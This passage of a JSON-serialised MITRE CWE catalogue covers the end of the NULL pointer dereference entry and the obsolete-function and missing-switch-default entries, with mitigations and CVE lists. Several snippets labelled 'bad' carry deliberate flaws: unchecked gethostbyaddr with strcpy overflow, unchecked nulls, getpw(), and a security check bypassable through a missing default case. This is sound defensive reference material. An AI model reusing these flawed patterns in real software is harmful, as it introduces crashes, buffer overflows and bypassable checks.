complete fixes aside from conscientious programming, the following steps will go a long way to ensure that NULL pointer dereferences do not occur.","Example_Code":{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"if (pointer1 != NULL) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","",""],"xhtml:i":["/* make use of pointer1 */","/* ... */"]}}}},"Body_Text":"If you are working with a multithreaded or otherwise asynchronous environment, ensure that proper locking APIs are used to lock before the if statement; and unlock when it has finished."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference (CWE-476) would then occur in the call to strcpy().","Note that this code is also vulnerable to a buffer overflow (CWE-119)."]},{"Intro_Text":"In the following code, the programmer assumes that the system always has a property named \\"cmd\\" defined. If an attacker can control the program\'s environment so that \\"cmd\\" is not defined, the program throws a NULL pointer exception when it attempts to call the trim() method.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String cmd = System.getProperty(\\"cmd\\");cmd = cmd.trim();","xhtml:br":""}}},{"attr":{"@_Demonstrative_Example_ID":"DX-110"},"Intro_Text":"This Android application has registered to handle a URL when sent an intent:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"IntentFilter filter = new IntentFilter(\\"com.example.URLHandler.openURL\\");MyReceiver receiver = new MyReceiver();registerReceiver(receiver, filter);public class UrlHandlerReceiver extends BroadcastReceiver {}","xhtml:br":["","","","","","",""],"xhtml:i":["...","..."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(\\"com.example.URLHandler.openURL\\".equals(intent.getAction())) {}","xhtml:div":{"#text":"String URL = intent.getStringExtra(\\"URLToOpen\\");int length = URL.length();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""],"xhtml:i":"..."}}}}}},"Body_Text":"The application assumes the URL will always be included in the intent. When the URL is not present, the call to getStringExtra() will return null, thus causing a null pointer exception when length() is called."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-3274","Description":"race condition causes a table to be corrupted if a timer activates while it is being modified, leading to resultant NULL dereference; also involves locking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3274"},{"Reference":"CVE-2002-1912","Description":"large number of packets leads to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1912"},{"Reference":"CVE-2005-0772","Description":"packet with invalid error status value triggers NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0772"},{"Reference":"CVE-2009-4895","Description":"Chain: race condition for an argument value, possibly resulting in NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4895"},{"Reference":"CVE-2009-2692","Description":"Chain: Use of an unimplemented network socket operation pointing to an uninitialized handler function (CWE-456) causes a crash because of a null pointer dereference (CWE-476).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2009-3547","Description":"Chain: race condition might allow resource to be released before operating on it, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547"},{"Reference":"CVE-2009-3620","Description":"Chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620"},{"Reference":"CVE-2009-2698","Description":"Chain: IP and UDP layers each track the same value with different mechanisms that can get out of sync, possibly resulting in a NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2698"},{"Reference":"CVE-2009-2692","Description":"Chain: uninitialized function pointers can be dereferenced allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2009-0949","Description":"Chain: improper initialization of memory can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0949"},{"Reference":"CVE-2008-3597","Description":"Chain: game server can access player data structures before initialization has happened leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3597"},{"Reference":"CVE-2020-6078","Description":"Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6078"},{"Reference":"CVE-2008-0062","Description":"Chain: a message having an unknown message type may cause a reference to uninitialized memory resulting in a null pointer dereference (CWE-476) or dangling pointer (CWE-825), possibly crashing the system or causing heap corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062"},{"Reference":"CVE-2008-5183","Description":"Chain: unchecked return value can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5183"},{"Reference":"CVE-2004-0079","Description":"SSL software allows remote attackers to cause a denial of service (crash) via a crafted SSL/TLS handshake that triggers a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0079"},{"Reference":"CVE-2004-0365","Description":"Network monitor allows remote attackers to cause a denial of service (crash) via a malformed RADIUS packet that triggers a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0365"},{"Reference":"CVE-2003-1013","Description":"Network monitor allows remote attackers to cause a denial of service (crash) via a malformed Q.931, which triggers a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1013"},{"Reference":"CVE-2003-1000","Description":"Chat client allows remote attackers to cause a denial of service (crash) via a passive DCC request with an invalid ID number, which causes a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1000"},{"Reference":"CVE-2004-0389","Description":"Server allows remote attackers to cause a denial of service (crash) via malformed requests that trigger a null dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0389"},{"Reference":"CVE-2004-0119","Description":"OS allows remote attackers to cause a denial of service (crash from null dereference) or execute arbitrary code via a crafted request during authentication protocol selection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0119"},{"Reference":"CVE-2004-0458","Description":"Game allows remote attackers to cause a denial of service (server crash) via a missing argument, which triggers a null pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0458"},{"Reference":"CVE-2002-0401","Description":"Network monitor allows remote attackers to cause a denial of service (crash) or execute arbitrary code via malformed packets that cause a NULL pointer dereference.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0401"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Null Dereference"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Null-pointer dereference"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Null Dereference (Null Pointer Dereference)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP34-C","Entry_Name":"Do not dereference null pointers","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP7","Entry_Name":"Faulty Pointer Use"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-1031"}},{"attr":{"@_External_Reference_ID":"REF-1032"}},{"attr":{"@_External_Reference_ID":"REF-1033"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Other_Notes, Potential_Mitigations, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"477":{"attr":{"@_ID":"477","@_Name":"Use of Obsolete Function","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses deprecated or obsolete functions, which suggests that the code has not been actively reviewed or maintained.","Extended_Description":{"xhtml:p":["As programming languages evolve, functions occasionally become obsolete due to:","Functions that are removed are usually replaced by newer counterparts that perform the same task in some different and hopefully improved way."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Advances in the language","Improved understanding of how operations should be performed effectively and securely","Changes in the conventions that govern certain operations"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode Quality Analysis"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Bytecode Weakness Analysis - including disassembler + source code weakness analysis"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Debugger"}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source Code Quality Analyzer","Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Origin Analysis"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Formal Methods / Correct-By-Construction","Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Refer to the documentation for the obsolete function in order to determine why it is deprecated or obsolete and to learn about alternative ways to achieve the same functionality."},{"Phase":"Requirements","Description":"Consider seriously the security implications of using an obsolete function. Consider using alternate functions."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code uses the deprecated function getpw() to verify that a plaintext password matches a user\'s encrypted password. If the password is valid, the function sets result to 1; otherwise it is set to 0.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...getpw(uid, pwdline);for (i=0; i&lt;3; i++){}result = strcmp(crypt(plainpw,cryptpw), cryptpw) == 0;...","xhtml:br":["","","",""],"xhtml:div":{"#text":"cryptpw=strtok(pwdline, \\":\\");pwdline=0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"Although the code often behaves correctly, using the getpw() function can be problematic from a security standpoint, because it can overflow the buffer passed to its second parameter. Because of this vulnerability, getpw() has been supplanted by getpwuid(), which performs the same lookup as getpw() but returns a pointer to a statically-allocated structure to mitigate the risk. Not all functions are deprecated or replaced because they pose a security risk. However, the presence of an obsolete function often indicates that the surrounding code has been neglected and may be in a state of disrepair. Software security has not been a priority, or even a consideration, for very long. If the program uses deprecated or obsolete functions, it raises the probability that there are security problems lurking nearby."},{"Intro_Text":"In the following code, the programmer assumes that the system always has a property named \\"cmd\\" defined. If an attacker can control the program\'s environment so that \\"cmd\\" is not defined, the program throws a null pointer exception when it attempts to call the \\"Trim()\\" method.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String cmd = null;...cmd = Environment.GetEnvironmentVariable(\\"cmd\\");cmd = cmd.Trim();","xhtml:br":["","",""]}}},{"Intro_Text":"The following code constructs a string object from an array of bytes and a value that specifies the top 8 bits of each 16-bit Unicode character.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String name = new String(nameBytes, highByte);...","xhtml:br":["",""]}},"Body_Text":"In this example, the constructor may not correctly convert bytes to characters depending upon which charset is used to encode the string represented by nameBytes. Due to the evolution of the charsets used to encode strings, this constructor was deprecated and replaced by a constructor that accepts as one of its parameters the name of the charset used to encode the bytes for conversion."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Obsolete"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL30-PL","Entry_Name":"Do not import deprecated modules","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP30-PL","Entry_Name":"Do not use deprecated or obsolete functions or modules","Mapping_Fit":"CWE More Specific"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Name, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Obsolete","attr":{"@_Date":"2008-01-30"}},{"#text":"Use of Obsolete Functions","attr":{"@_Date":"2017-11-08"}}]}},"478":{"attr":{"@_ID":"478","@_Name":"Missing Default Case in Switch Statement","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code does not have a default case in a switch statement, which might lead to complex logical errors and resultant weaknesses.","Extended_Description":"This flaw represents a common problem in software development, in which not all possible values for a variable are considered or handled by a given process. Because of this, further decisions are made based on poor information, and cascading failure results. This cascading failure may result in any number of security issues, and constitutes a significant failure in the system.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1023","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":["Varies by Context","Alter Execution Logic"],"Note":"Depending on the logical circumstances involved, any consequences may result: e.g., issues of confidentiality, authentication, authorization, availability, integrity, accountability, or non-repudiation."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Ensure that there are no unaccounted for cases, when adjusting flow or values based on the value of a given variable. In switch statements, this can be accomplished through the use of the default label."},{"Phase":"Implementation","Description":"In the case of switch style statements, the very simple act of creating a default case can mitigate this situation, if done correctly. Often however, the default case is used simply to represent an assumed option, as opposed to working as a check for invalid input. This is poor practice and in some cases is as bad as omitting a default case entirely."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following does not properly check the return code in the case where the security_check function returns a -1 value when an error occurs. If an attacker can supply data that will invoke an error, the attacker can bypass the security check:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define FAILED 0#define PASSED 1int result;...result = security_check(data);switch (result) {}...","xhtml:br":["","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case FAILED:case PASSED:","xhtml:div":[{"#text":"printf(\\"Security check failed!\\\\n\\");exit(-1);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:i":"//Break never reached because of exit()"},{"#text":"printf(\\"Security check passed.\\\\n\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}},"xhtml:i":"// program execution continues..."}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"#define FAILED 0#define PASSED 1int result;...result = security_check(data);switch (result) {}","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case FAILED:case PASSED:default:","xhtml:div":[{"#text":"printf(\\"Security check failed!\\\\n\\");exit(-1);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:i":"//Break never reached because of exit()"},{"#text":"printf(\\"Security check passed.\\\\n\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"printf(\\"Unknown error (%d), exiting...\\\\n\\",result);exit(-1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}}}],"Body_Text":["Instead a default label should be used for unaccounted conditions:","This label is used because the assumption cannot be made that all possible cases are accounted for. A good practice is to reserve the default case for error handling."]},{"Intro_Text":"In the following Java example the method getInterestRate retrieves the interest rate for the number of points for a mortgage. The number of points is provided within the input parameter and a switch statement will set the interest rate value to be returned based on the number of points.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public static final String INTEREST_RATE_AT_ZERO_POINTS = \\"5.00\\";public static final String INTEREST_RATE_AT_ONE_POINTS = \\"4.75\\";public static final String INTEREST_RATE_AT_TWO_POINTS = \\"4.50\\";...public BigDecimal getInterestRate(int points) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BigDecimal result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);switch (points) {}return result;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case 0:case 1:case 2:","xhtml:div":[{"#text":"result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"result = new BigDecimal(INTEREST_RATE_AT_ONE_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"result = new BigDecimal(INTEREST_RATE_AT_TWO_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public static final String INTEREST_RATE_AT_ZERO_POINTS = \\"5.00\\";public static final String INTEREST_RATE_AT_ONE_POINTS = \\"4.75\\";public static final String INTEREST_RATE_AT_TWO_POINTS = \\"4.50\\";...public BigDecimal getInterestRate(int points) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BigDecimal result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);switch (points) {}return result;","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case 0:case 1:case 2:default:","xhtml:div":[{"#text":"result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"result = new BigDecimal(INTEREST_RATE_AT_ONE_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"result = new BigDecimal(INTEREST_RATE_AT_TWO_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.err.println(\\"Invalid value for points, must be 0, 1 or 2\\");System.err.println(\\"Returning null value for interest rate\\");result = null;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["","",""]}}}}}}],"Body_Text":"However, this code assumes that the value of the points input parameter will always be 0, 1 or 2 and does not check for other incorrect values passed to the method. This can be easily accomplished by providing a default label in the switch statement that outputs an error message indicating an invalid value for the points input parameter and returning a null value."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to account for default case in switch"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, 